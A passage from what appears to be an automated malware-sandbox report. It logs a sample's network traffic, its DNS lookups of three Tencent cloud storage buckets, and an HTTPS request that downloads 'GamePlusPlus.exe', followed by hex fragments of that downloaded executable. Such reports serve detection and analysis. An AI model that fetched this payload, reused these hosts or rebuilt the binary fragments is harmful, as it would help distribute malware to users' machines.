Jan 16, 2025 13:35:15.245836020 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.245877981 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.245887041 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.245925903 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.256020069 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.256047964 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.256093025 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.256108046 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.256133080 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.261284113 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.261356115 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.261365891 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.279608965 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.279668093 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.279730082 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.279768944 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.279813051 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.280323982 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.300450087 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.300483942 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.300566912 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.300859928 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.300872087 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:16.700256109 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:16.701549053 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:16.701587915 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.098151922 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.098182917 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.098206043 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.098258972 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.098294020 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.098314047 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.098350048 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.179758072 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.179840088 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.179887056 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.179904938 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.179915905 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.179950953 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.181317091 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.181411982 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.181420088 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.181463957 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.181474924 CET	443	49745	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.181602955 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.181915998 CET	49745	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.575496912 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.575521946 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:17.575596094 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.575831890 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:17.575843096 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:18.967067003 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:18.967210054 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:18.967793941 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:18.967866898 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.020474911 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.020514965 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.021595955 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.044249058 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.087342024 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.461998940 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.462083101 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.462148905 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.462179899 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.462217093 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.462245941 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.462280035 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.543443918 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.543484926 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.543543100 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.543570042 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.543591022 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.543632030 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.547012091 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.547043085 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.547099113 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.547112942 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.547147989 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.547169924 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.627585888 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.627619028 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.627701998 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.627741098 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.627789021 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.629317999 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.629342079 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.629395962 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.629415989 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.629448891 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.629466057 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.632774115 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.632797956 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.632863998 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.632891893 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.632932901 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.635870934 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.635895967 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.635957003 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.635972977 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.636035919 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715197086 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715296984 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715339899 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715393066 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715414047 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715445995 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715734959 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715759039 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715797901 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715809107 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.715842962 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.715862989 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.717135906 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.717160940 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.717247009 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.717266083 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.717300892 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.717325926 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.726846933 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.726871014 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.726974010 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.727015018 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.727066994 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.736586094 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.736618996 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.736987114 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.737010002 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.737216949 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.750097990 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.750128984 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.750426054 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.750468969 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.750637054 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.755698919 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.755726099 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.755804062 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.755816936 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.755861044 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.766158104 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.766184092 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.766304970 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.766318083 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.766470909 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.802486897 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802548885 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802810907 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.802810907 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.802855015 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802874088 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802910089 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802915096 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.802925110 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.802970886 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.803020954 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.804449081 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804471016 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804513931 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804562092 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.804563999 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804583073 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804615021 CET	443	49759	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.804617882 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.804656982 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.804701090 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.805306911 CET	49759	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.823652029 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.823685884 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:19.823816061 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.824249029 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:19.824260950 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:21.280426025 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:21.282265902 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:21.282288074 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:22.243088961 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:22.243108988 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:22.243177891 CET	443	49772	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:22.243243933 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:22.243308067 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:22.247334957 CET	49772	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:37.599299908 CET	49887	443	192.168.2.6	149.115.250.19
Jan 16, 2025 13:35:37.599358082 CET	443	49887	149.115.250.19	192.168.2.6
Jan 16, 2025 13:35:37.599417925 CET	49887	443	192.168.2.6	149.115.250.19
Jan 16, 2025 13:35:41.123590946 CET	49887	443	192.168.2.6	149.115.250.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 13:35:07.368971109 CET	62046	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:35:08.016567945 CET	53	62046	1.1.1.1	192.168.2.6
Jan 16, 2025 13:35:10.504986048 CET	64469	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:35:10.971652031 CET	53	64469	1.1.1.1	192.168.2.6
Jan 16, 2025 13:35:17.189640045 CET	52463	53	192.168.2.6	1.1.1.1
Jan 16, 2025 13:35:17.574259043 CET	53	52463	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 13:35:07.368971109 CET	192.168.2.6	1.1.1.1	0x43ab	Standard query (0)	wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:10.504986048 CET	192.168.2.6	1.1.1.1	0xa46f	Standard query (0)	www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:17.189640045 CET	192.168.2.6	1.1.1.1	0xca58	Standard query (0)	wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 13:35:08.016567945 CET	1.1.1.1	192.168.2.6	0x43ab	No error (0)	wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	cq.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:35:08.016567945 CET	1.1.1.1	192.168.2.6	0x43ab	No error (0)	cq.file.myqcloud.com		183.66.100.45	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:08.016567945 CET	1.1.1.1	192.168.2.6	0x43ab	No error (0)	cq.file.myqcloud.com		183.66.100.51	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:10.971652031 CET	1.1.1.1	192.168.2.6	0xa46f	No error (0)	www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	gz.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:35:10.971652031 CET	1.1.1.1	192.168.2.6	0xa46f	No error (0)	gz.file.myqcloud.com		159.75.57.35	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:10.971652031 CET	1.1.1.1	192.168.2.6	0xa46f	No error (0)	gz.file.myqcloud.com		159.75.57.69	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:17.574259043 CET	1.1.1.1	192.168.2.6	0xca58	No error (0)	wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	cq.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:35:17.574259043 CET	1.1.1.1	192.168.2.6	0xca58	No error (0)	cq.file.myqcloud.com		183.66.100.45	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:35:17.574259043 CET	1.1.1.1	192.168.2.6	0xca58	No error (0)	cq.file.myqcloud.com		183.66.100.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com

www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com

wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	183.66.100.45	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:09 UTC	122	OUT	GET /GamePlusPlus.exe HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com Connection: Keep-Alive
2025-01-16 12:35:09 UTC	476	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 251488 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:09 GMT ETag: "8038ebb15ec202ad0a25564e55cdf32d" Last-Modified: Fri, 10 Jan 2025 23:33:38 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3850572715590273645 x-cos-request-id: Njc4OGZjZmRfYTY3NDA1MGJfMTRjNGNfYmJkMGJkOQ== x-cos-server-side-encryption: AES256
2025-01-16 12:35:09 UTC	7728	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 56 4c 56 00 01 00 00 00 00 aa 03 00 64 74 57 67 8e 34 ad 80 ce 03 33 48 6c 71 5d cf 9e 73 38 d8 4e 1c 11 02 94 75 6a ca cd 67 0b b2 33 75 b0 0c 4a bd 75 8c 5e 6f 16 04 41 05 68 74 98 bf 2b fd 7d 15 34 a5 fe 06 46 ad 81 43 a5 b5 a6 0c a5 7d 3a 1f 7e 14 7e 60 f5 e5 a3 e6 5d 54 c8 6a 56 e1 e5 56 c5 75 83 63 0a ec 65 1d 28 5f 66 9d 9e 55 9a a8 36 9e 5e 8b 2f 42 7d 69 fd 85 c9 5c 3a fb 75 b8 92 df f7 be f3 90 4f c9 a0 40 62 f9 de e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@VLVdtWg43Hlq]s8Nujg3uJu^oAht+}4FC}:~~`]TjVVuce(_fU6^/B}i\:uO@b
2025-01-16 12:35:09 UTC	16384	IN	Data Raw: 2c f6 ff ff 48 8b 05 d5 c7 02 00 48 85 c0 75 18 48 8d 55 6f 48 8d 0d e5 02 02 00 ff 15 57 fd 01 00 48 89 05 b8 c7 02 00 4c 8b 10 45 33 c9 4c 8d 05 fb 02 02 00 48 8d 15 d4 02 02 00 48 8b c8 41 ff 52 30 8b d8 48 8d 0d 44 c7 02 00 e8 df f5 ff ff 4c 8b 15 a0 c7 02 00 4d 85 d2 75 1b 48 8d 55 6f 48 8d 0d d8 02 02 00 ff 15 0a fd 01 00 4c 8b d0 48 89 05 80 c7 02 00 48 8d 4c 24 30 48 83 7d 8f 10 48 0f 43 4c 24 30 4c 8d 4d b7 48 83 7d cf 10 4c 0f 43 4d b7 49 8b 02 48 89 4c 24 20 44 8b c3 49 8b d7 49 8b ca ff 10 90 48 8b 55 8f 48 83 fa 10 72 32 48 ff c2 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 91 00 00 00 e8 36 c5 01 00 66 0f 6f 05 e2 02 02 00 f3 0f 7f 45 87 c6 44 24 30 00 48 8b 55 cf 48 83 fa Data Ascii: ,HHuHUoHWHLE3LHHAR0HDLMuHUoHLHHL$0H}HCL$0LMH}LCMIHL$ DIIHUHr2HHL$0HHrH'HIH+HH6foED$0HUH
2025-01-16 12:35:09 UTC	8168	IN	Data Raw: 48 89 5c 24 08 48 89 54 24 10 57 48 83 ec 20 48 8b f9 48 8b da 48 8d 0d b4 89 02 00 e8 a7 95 01 00 85 c0 74 07 8b c8 e8 a8 95 01 00 48 8b 97 e8 00 00 00 48 8d 8f e0 00 00 00 48 8b 01 48 3b c2 74 0e 48 39 18 74 27 48 83 c0 08 48 3b c2 75 f2 48 8b 51 08 48 39 51 10 74 0a 48 89 1a 48 83 41 08 08 eb 0a 4c 8d 44 24 38 e8 52 f8 ff ff 48 8d 0d 5b 89 02 00 e8 54 95 01 00 85 c0 74 07 8b c8 e8 4f 95 01 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 6c 24 18 48 89 7c 24 20 41 56 48 83 ec 50 49 8b e8 4c 8b f2 48 8b f9 e8 92 b3 00 00 48 85 c0 0f 84 58 01 00 00 4d 85 f6 0f 84 4f 01 00 00 48 89 5c 24 60 48 89 74 24 68 e8 71 b3 00 00 48 8b c8 48 8d 54 24 30 e8 74 af 00 00 4c 8b 44 24 30 48 8b 74 24 38 4c 3b c6 74 54 49 8d 58 08 90 48 83 7b 18 10 48 8b c3 72 03 48 8b 03 48 83 Data Ascii: H\$HT$WH HHHtHHHH;tH9t'HH;uHQH9QtHHALD$8RH[TtOH\$0H _Hl$H\|$ AVHPILHHXMOH\$`Ht$hqHHT$0tLD$0Ht$8L;tTIXH{HrHH
2025-01-16 12:35:09 UTC	8184	IN	Data Raw: 19 00 75 14 0f 1f 40 00 48 8b 43 10 80 78 19 00 75 25 48 8b d8 eb f1 90 48 8b 48 08 80 79 19 00 75 0a 48 3b 01 75 05 48 8b c1 eb ec 48 8b d8 80 78 19 00 48 0f 44 d9 8b 43 40 41 3b c6 74 05 0f 92 c0 eb 3e 48 8b d6 48 83 7e 18 10 72 03 48 8b 16 48 8d 4b 20 48 83 7b 38 10 72 04 48 8b 4b 20 4c 8b 43 30 4c 3b 46 10 75 09 e8 4f 76 01 00 85 c0 74 5b 48 8b d6 48 8d 4b 20 e8 f9 11 00 00 c1 e8 1f 84 c0 74 48 48 8b 43 10 49 8b d4 49 8b cd 80 78 19 00 48 8b 84 24 a0 00 00 00 48 89 44 24 28 48 89 74 24 20 74 13 4c 8b cb 45 33 c0 e8 e5 fa ff ff 49 8b c4 e9 67 01 00 00 4c 8b cf 41 b0 01 e8 d2 fa ff ff 49 8b c4 e9 54 01 00 00 8b 47 40 41 3b c6 74 05 0f 92 c0 eb 42 48 8b d6 48 83 7e 18 10 72 03 48 8b 16 48 8d 4f 20 48 83 7f 38 10 72 04 48 8b 4f 20 4c 8b 47 30 4c 3b 46 10 Data Ascii: u@HCxu%HHHyuH;uHHxHDC@A;t>HH~rHHK H{8rHK LC0L;FuOvt[HHK tHHCIIxH$HD$(Ht$ tLE3IgLAITG@A;tBHH~rHHO H8rHO LG0L;F
2025-01-16 12:35:09 UTC	8184	IN	Data Raw: 01 48 89 46 10 48 8b c6 48 83 fa 10 72 03 48 8b 06 48 8d 1c 08 41 b8 01 00 00 00 48 8b cb 48 8d 15 ff 98 01 00 e8 a8 56 01 00 44 88 73 01 eb 21 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d e2 98 01 00 44 0f b6 c0 48 8b ce 8d 50 01 e8 bf 72 ff ff 48 8b 56 18 48 8b 4e 10 48 8b c2 48 2b c1 48 83 f8 01 72 30 48 8d 41 01 48 89 46 10 48 83 fa 10 72 03 48 8b 36 48 8d 1c 0e 41 b8 01 00 00 00 48 8b cb 48 8d 15 96 98 01 00 e8 43 56 01 00 44 88 73 01 eb 21 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d 79 98 01 00 44 0f b6 c0 48 8b ce 8d 50 01 e8 5a 72 ff ff 4d 85 e4 74 08 41 c7 04 24 02 00 00 00 48 8b 54 24 68 48 83 fa 10 72 35 48 8b 4c 24 50 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 fb 7a 01 00 cc e8 Data Ascii: HFHHrHHAHHVDs!3HD$ LDHPrHVHNHH+Hr0HAHFHrH6HAHHCVDs!3HD$ LyDHPZrMtA$HT$hHr5HL$PHHHrHIH'H+HHvz
2025-01-16 12:35:09 UTC	8184	IN	Data Raw: 48 8b 53 18 48 83 fa 10 72 36 48 8b 0b 48 ff c2 48 89 54 24 48 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 48 89 54 24 48 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1d 49 8b c8 e8 04 26 01 00 48 89 73 10 48 c7 43 18 0f 00 00 00 c6 03 00 48 83 c3 20 eb a1 ff 15 a5 5b 01 00 4c 89 6c 24 20 48 8b 9c 24 e0 00 00 00 48 8b 43 08 4d 8d 77 20 48 89 7c 24 58 0f 1f 00 48 3b f8 74 36 49 89 76 10 49 89 76 18 0f 10 07 41 0f 11 06 0f 10 4f 10 41 0f 11 4e 10 48 89 77 10 48 c7 47 18 0f 00 00 00 c6 07 00 49 83 c6 20 48 83 c7 20 48 89 7c 24 58 eb c5 49 8b de 48 89 5c 24 68 49 3b de 74 5c 48 8b 53 18 48 83 fa 10 72 36 48 8b 0b 48 ff c2 48 89 54 24 60 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 48 89 54 24 60 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1d 49 8b c8 e8 44 25 01 Data Ascii: HSHr6HHHT$HHrH'HT$HLAI+HAHwI&HsHCH [Ll$ H$HCMw H\|$XH;t6IvIvAOANHwHGI H H\|$XIH\$hI;t\HSHr6HHHT$`HrH'HT$`LAI+HAHwID%
